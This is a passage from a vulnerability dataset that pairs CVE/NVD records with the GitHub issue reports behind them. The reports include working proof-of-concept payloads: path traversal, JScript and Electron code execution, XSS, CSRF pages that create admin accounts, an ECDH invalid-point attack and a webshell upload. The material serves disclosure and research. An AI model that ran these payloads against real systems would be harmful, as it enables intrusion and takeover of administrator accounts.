"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.221735"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.221735"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.221735"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.221735"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:muyucms:muyucms:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E558AF9C-EBCD-4299-94C6-E32EC2D9C336",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/MuYuCMS/MuYuCMS/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"MuYuCMS",
"MuYuCMS"
] | ### Arbitrary file read vulnerability
1、We put a txt file in the root of our website with the file name test.txt and the content is "muyucms"
2、Constructing packets after logging into the system
```php
GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close
```
3、I read the txt file successfully

| MuYucms has Arbitrary file read vulnerability | https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/3/comments | 0 | 2023-02-22T14:38:01Z | 2023-02-22T14:38:01Z | https://github.com/MuYuCMS/MuYuCMS/issues/3 | 1,595,222,065 | 3 | 4,759 |
CVE-2023-1004 | 2023-02-24T08:15:11.337 | A vulnerability has been found in MarkText up to 0.17.1 on Windows and classified as critical. Affected by this vulnerability is an unknown functionality of the component WSH JScript Handler. The manipulation leads to code injection. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-221737 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/marktext/marktext/issues/3575"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221737"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221737"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/marktext/marktext/issues/3575"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221737"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221737"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:marktext:marktext:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AB68239C-90DB-4BD3-AF7E-5A79E97A7093",
"versionEndExcluding": null,
"versionEndIncluding": "0.17.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"94"
] | 94 | https://github.com/marktext/marktext/issues/3575 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"marktext",
"marktext"
] | ## Description
Although marktext filters most dangeruos suffix, it still retains the `.js` file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
Version: 0.17.1(latest)

## Attachment
[poc.md](https://github.com/marktext/marktext/files/10695098/poc.md)
poc.html
```html
<!-- auto download !-->
<html>
<script>
var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'poc.js';
a.click();
</script>
</html>
<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
```
poc.js
```js
var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0)
WScript.Echo("You were hacked.")
WScript.Quit();
``` | MarkText on Windows doesn't filter WSH JScript, which may cause code execution | https://api.github.com/repos/marktext/marktext/issues/3575/comments | 0 | 2023-02-09T08:53:23Z | 2023-02-09T08:54:23Z | https://github.com/marktext/marktext/issues/3575 | 1,577,486,386 | 3,575 | 4,760 |
CVE-2023-1005 | 2023-02-24T09:15:10.660 | A vulnerability was found in JP1016 Markdown-Electron and classified as critical. Affected by this issue is some unknown functionality. The manipulation leads to code injection. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-221738 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JP1016/Markdown-Electron/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221738"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221738"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/JP1016/Markdown-Electron/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221738"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221738"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:markdown-electron_project:markdown-electron:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E162A5E8-7B8D-4D9F-B38C-A2A09BF3DD2F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/JP1016/Markdown-Electron/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"JP1016",
"Markdown-Electron"
] | `nodeIntegration: true` decide Node APIs are enabled in renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open the unknown markdwon file, it may cause Remote code execution (RCE).
EXP
```html
# 0 click
<img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'>
# 1 click
<a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a>
```

| Incorrect electron configuration causes RCE | https://api.github.com/repos/JP1016/Markdown-Electron/issues/3/comments | 1 | 2023-02-03T06:14:58Z | 2025-03-14T09:00:51Z | https://github.com/JP1016/Markdown-Electron/issues/3 | 1,569,283,633 | 3 | 4,761 |
CVE-2021-33387 | 2023-02-24T16:15:11.447 | Cross Site Scripting Vulnerability in MiniCMS v.1.10 allows attacker to execute arbitrary code via a crafted get request. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/bg5sbk/MiniCMS/issues/40"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/bg5sbk/MiniCMS/issues/40"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:1234n:minicms:1.10:*:*:*:*:*:*:*",
"matchCriteriaId": "1EAC73A0-FD32-4344-A4F5-BB6D3D1B7DA7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/bg5sbk/MiniCMS/issues/40 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"bg5sbk",
"MiniCMS"
] | On the homepage, you can generate a exp like below:
/?tag/"><img src=1 onerror=alert(1)><a href=/?page=12
and you will get a alert like this

full link:
http://1234n.com/?tag/%22%3E%3Cimg%20src=1%20onerror=alert(123)%3E%3Ca%20href=/?page=12 | 1 XSS I found | https://api.github.com/repos/bg5sbk/MiniCMS/issues/40/comments | 0 | 2021-05-14T13:49:05Z | 2021-07-19T17:35:34Z | https://github.com/bg5sbk/MiniCMS/issues/40 | 891,938,665 | 40 | 4,762 |
CVE-2023-23205 | 2023-02-24T16:15:11.940 | An issue was discovered in lib60870 v2.3.2. There is a memory leak in lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/mz-automation/lib60870/issues/132"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/mz-automation/lib60870/issues/132"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mz-automation:lib60870:2.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C775EFAE-1EDD-45BC-B606-8E2E794A508C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/mz-automation/lib60870/issues/132 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"mz-automation",
"lib60870"
] | Hello, there is a memory leak in lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c:213.
In the directory lib60870/lib60870-C/examples/multi_client_server,this pointer newAsdu in multi_client_server.c:213 is not freed in the end. It will cause memory leaks.
steps to reproduce:
I used gcc 9.4 and AddressSanitizer (export **CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"** before **make**) to build lib60870/lib60870-C/examples/multi_client_server.
Run this program multi_client_server.
Press the button Ctrl+C to terminate the program multi_client_server.
**ASAN Output**
```
$ ./multi_client_server
^C
=================================================================
==11375==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 296 byte(s) in 1 object(s) allocated from:
#0 0x7fa9a372d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x55956bd32773 in Memory_malloc src/hal/memory/lib_memory.c:33
#2 0x55956bd25f59 in CS101_ASDU_create src/iec60870/cs101/cs101_asdu.c:90
#3 0x55956bd1a052 in main /home/saltf1sh/target/lib60870/lib60870-C/examples/multi_client_server/multi_client_server.c:213
#4 0x7fa9a342f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
SUMMARY: AddressSanitizer: 296 byte(s) leaked in 1 allocation(s).
``` | Memory leaks in multi_client_server.c:213 | https://api.github.com/repos/mz-automation/lib60870/issues/132/comments | 3 | 2023-01-04T14:53:34Z | 2023-01-06T14:49:26Z | https://github.com/mz-automation/lib60870/issues/132 | 1,519,114,243 | 132 | 4,763 |
CVE-2022-44310 | 2023-02-24T20:15:16.330 | In Development IL ecdh before 0.2.0, an attacker can send an invalid point (not on the curve) as the public key, and obtain the derived shared secret. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/developmentil/ecdh/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/developmentil/ecdh/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ecdh_project:ecdh:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "93551A65-6D02-411A-AB0B-BE3803C58FC5",
"versionEndExcluding": "0.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"668"
] | 668 | https://github.com/developmentil/ecdh/issues/3 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"developmentil",
"ecdh"
] | Hi.
Recently I found a vulnerability in https://github.com/developmentil/ecdh/blob/2aca0e399a4351688a2e41200c46f8b48f697799/index.js#L164, the `deriveSharedSecret` function only checks whether the format of the public key object is legal, but does not check whether its content is legal, this will lead to an invalid curve attack, an attacker can send an invalid point which not on the curve as public key, and then he can get the derived shared secret.
This is a classic attack method on ECDH, more details can be seen at https://crypto.stackexchange.com/questions/3820/why-do-public-keys-need-to-be-validated.
For example, if the attacker set the public key point to (0, 0), then the derived shared secret will always be 0:
```
// Change Bob's public key to a invalid point which not on the curve, e.g. (0, 0)
bobKeys.publicKey.Q.x.x = BigInteger.ZERO
bobKeys.publicKey.Q.y.x = BigInteger.ZERO
// Alice generate the shared secret:
var aliceSharedSecret = aliceKeys.privateKey.deriveSharedSecret(bobKeys.publicKey);
// the shared secret will always be 00000000000000000000000000000000
console.log('shared secret:', aliceSharedSecret.toString('hex'));
```
Since I see there are also some other projects depend on this implementation, I think it might be necessary to check and fix this vulnerability.
You can also contact me if you have any other question, best wishes. | A security issue in ECDH derive shared secret | https://api.github.com/repos/developmentil/ecdh/issues/3/comments | 4 | 2022-10-24T07:16:03Z | 2022-10-24T13:35:19Z | https://github.com/developmentil/ecdh/issues/3 | 1,420,337,088 | 3 | 4,764 |
CVE-2021-34167 | 2023-02-24T21:15:10.627 | Cross Site Request Forgery (CSRF) vulnerability in taoCMS 3.0.2 allows remote attackers to gain escalated privileges via taocms/admin/admin.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/taogogo/taocms/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | After the administrator logged in, when he opened following malicious pages, CSRF(Cross Site Request Forgery) vulnerabilities occurred.
**poc:**
**one.html—add a new account which has administrator privileges**
```html
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='name' value='test' />";
fields += "<input type='hidden' name='passwd' value='test' />";
fields += "<input type='hidden' name='auth_level' value='admin' />";
fields += "<input type='hidden' name='auth_cat' value='' />";
fields += "<input type='hidden' name='status' value='1' />";
fields += "<input type='hidden' name='action' value='admin' />";
fields += "<input type='hidden' name='id' value='' />";
fields += "<input type='hidden' name='ctrl' value='save' />";
fields += "<input type='hidden' name='Submit' value='浜¤' />";
var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
```

After finish this CSRF attack, we can see that a new account has been added.

**two.html—change current administrator’s password**
```html
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='pwd' value='admin123' />";
fields += "<input type='hidden' name='action' value='user' />";
fields += "<input type='hidden' name='ctrl' value='update' />";
fields += "<input type='hidden' name='Submit' value='¿®”¹!' />";
var url = "http://127.0.0.1/taocms-3.0.2/admin/admin.php";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
```
After that, the administrator’s will change from ‘admin’ to ‘admin123’.
**Solution:**
Better add a CSRF token or CAPTCHA for each important request.
| There are two CSRF vulnerabilities that can add administrator account and change administrator password | https://api.github.com/repos/taogogo/taocms/issues/6/comments | 1 | 2021-05-30T17:59:11Z | 2021-07-29T13:55:44Z | https://github.com/taogogo/taocms/issues/6 | 906,833,744 | 6 | 4,765 |
CVE-2021-35290 | 2023-02-24T21:15:10.843 | File Upload vulnerability in balerocms-src 0.8.3 allows remote attackers to run arbitrary code via rich text editor on /admin/main/mod-blog page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/anibalgomezprojects/balerocms-src/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/anibalgomezprojects/balerocms-src/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:balero_cms_project:balero_cms:0.8.3:*:*:*:*:*:*:*",
"matchCriteriaId": "F290F3A2-4884-4D96-BDC3-D80813974B24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/anibalgomezprojects/balerocms-src/issues/2 | [
"Issue Tracking"
] | github.com | [
"anibalgomezprojects",
"balerocms-src"
] | After logging in the administrator,open the following page to edit a blog
./admin/main/mod-blog

the code of the CMS' uploader<Uploader.php>
code:
public function image($file, $path) {
if (!$file['error']) {
if (!$file['error']) {
$name = md5(rand(100, 200));
$ext = explode('.', $file['name']);
$filename = $name . '.' . $ext[1];
if(!is_writable($path . "/public/images/")) {
throw new Exception("Directory " . $path . "/public/images is not writable.
Set chmod permissions to 777.");
}
$destination = $path . "/public/images/" . $filename; //change this directory
$location = $file["tmp_name"];
move_uploaded_file($location, $destination);
} else {
throw new Exception("Ooops! Your upload triggered
the following error: " . $file['error']);
}
}
return $this->getBasepath($path) . "/public/images/" . $filename;
}
public function getBasepath($path) {
$config = simplexml_load_file($path . "/site/etc/balero.config.xml");
return $config->site[0]->basepath;
}
Shellcode
create it as shell.php.jpg

You'll successfully connect it with AntSword.

| There is a File Upload vulnerablility that can upload a webshell in the CMS. | https://api.github.com/repos/anibalgomezprojects/balerocms-src/issues/2/comments | 1 | 2021-06-09T14:39:45Z | 2023-03-06T07:10:43Z | https://github.com/anibalgomezprojects/balerocms-src/issues/2 | 916,283,670 | 2 | 4,766 |
CVE-2023-1043 | 2023-02-26T13:15:10.523 | A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
